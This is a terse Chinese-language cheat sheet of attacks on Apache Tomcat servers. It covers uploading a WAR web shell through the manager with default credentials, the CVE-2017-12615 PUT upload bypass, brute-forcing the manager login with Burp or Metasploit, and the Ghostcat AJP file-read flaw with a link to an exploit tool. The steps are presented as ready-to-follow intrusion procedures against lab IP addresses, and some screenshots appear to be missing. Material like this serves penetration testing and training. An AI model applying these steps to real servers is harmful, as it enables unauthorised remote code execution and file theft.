一、后台war包getshell
漏洞利用:
tomcat在conf/tomcat-users.xml配置用戶權限
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<role rolename="manager-jmx"/>
<role rolename="manager-status"/>
<role rolename="admin-gui"/>
<role rolename="admin-script"/>
<user username="tomcat" password="tomcat" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script" />
</tomcat-users>
1、構建war包
jar cvf shell.war test.jsp

2、后台頁面上傳tomcat自動解壓war包
http://172.16.20.134:8080/manager/html

3、cknife連接getshell
http://172.16.20.134:8080/shell/test.jsp

二、tomcat任意上傳漏洞CVE-2017--12615
漏洞利用:
conf/web.xml處理.jsp 和 .jspx 的時候,是通過JspServlet處理請求的,當.jsp后面有空格的時候交給defaultServlet處理
影響windows linux
1、訪問域名抓包
payload:
shell.jsp/
put上傳shell.jsp/ 繞過windows,linux。

2、訪問域名http://172.16.20.134:8080/test.jsp getshell

三、后台爆破
1、后台base64編碼傳輸
抓包

字段解密為:

payload選擇custom itrerator




選擇base64編碼

點這爆破

msf爆破search tomcat_mgr_login
四.CNVD-2020-10487-Tomcat-Ajp-lfi
Tomcat-Ajp協議文件讀取漏洞
工具地址:https://github.com/AdministratorGithub/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py

